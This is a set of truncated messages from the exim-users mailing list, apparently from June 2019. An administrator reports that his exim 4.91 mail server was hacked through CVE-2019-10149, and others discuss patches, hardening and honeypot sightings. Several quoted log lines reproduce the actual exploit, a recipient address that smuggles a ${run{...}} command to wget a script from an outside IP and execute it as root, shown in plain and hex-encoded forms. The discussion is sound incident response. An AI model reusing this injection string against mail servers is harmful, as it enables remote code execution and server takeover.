Thanks Marius,
Yes indeed, no argument at all. I've been involved in UNIX security for
30 years (and so should have known better anyway).
Luckily, in this case, the script-kiddies' efforts seem naive, and they
weren't even able to succeed in opening up SSH access, despite having
root and atte
thanks Heiko, yes, good point re unstable.
In this case, the fix /was/ available in unstable, but a few other
issues with updating had led to a delay, on that system, which proved
unfortunate.
thanks,
calum.
On 19/06/2019 12:47 pm, Heiko Schlittermann via Exim-users wrote:
Calum Mackay via
Interesting point, thanks Jan.
No external users/customers on this system, fortunately. If there were,
or it had anything sensitive anywhere near it, I'd not have been running
unstable on it, and it would have been updated much more frequently.
thanks,
calum.
On 19/06/2019 3:18 pm, Jan Ingv
On 11.06.19 at 19:34, Calum Mackay via Exim-users wrote:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised,
On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <exim-users@exim.org> wrote:
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the dama
Calum Mackay via Exim-users (Tue 11 Jun 2019 01:39:22 CEST):
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.
But generally speaking, I
hi all,
My mail system has just been hacked; it's running Debian unstable exim
4.91-9
Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
The reasons I suspect exim involvement:
• starting today, every 5 mins getting frozen messages:
The following address(es) have ye
On 11.06.19 at 19:34, Calum Mackay wrote:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running
I'm still catching up, but…
On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Is that still necessary/advised, now I'm running 4.92?
thanks,
calum.
thanks all, for the replies.
On 11/06/2019 7:27 am, Odhiambo Washington wrote:
ought I to be reporting this anywhere?
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
Yes, I meant that there are clearly now exploits active, alth
I googled 'an7kmd2wp4xo7hpr'
I came across
https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739
Looks like Zimbra (I suppose / assume any MTA), is being "probed" and
pertaining to CVE-2019-9670
Regards
Brent
On 2019/06/11 14:46, Konstantin Boyandin via Exim-users wrote:
Hi C
On 11.06.19 at 14:46, Konstantin Boyandin via Exim-users wrote:
> I don't know where to report such things. To malware/antivirus
> manufacturers, perhaps?
>
> But the proper question is, IMHO, "why I haven't hardened my Exim
> installations while I could".
>
The Hoster:
#whois 1.2.3.4 | grep -i
Hi Calum,
Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
attacked yesterday by similar means. The attacker, in my case, tried to
download and execute one of the below (I excluded scheme prefix from links):
an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targeting Linux systems using systemd.
Not only that, it is
On Tue, 11 Jun 2019 at 10:26, Cyborg via Exim-users wrote:
> On 11.06.19 at 02:10, Calum Mackay via Exim-users wrote:
> >
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2f
Hi,
On Tue 11 Jun 2019 at 7:53, Cyborg via Exim-users wrote:
> :
> Restricted characters in address
Oh, you censored the address you are sending from? :-D
> This attack was presented to you by... the Seychelles Islands.
Ah, and I wondered why I did not see any try in my logs.
But I have
On 11.06.19 at 02:10, Calum Mackay via Exim-users wrote:
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\
On 11.06.19 at 08:27, Odhiambo Washington via Exim-users wrote:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <exim-users@exim.org> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't
You got it.
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
On 11 June 2019 02:10:40 CEST, Calum Mackay via Exim-users wrote:
>hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <exim-users@exim.org> wrote:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim invol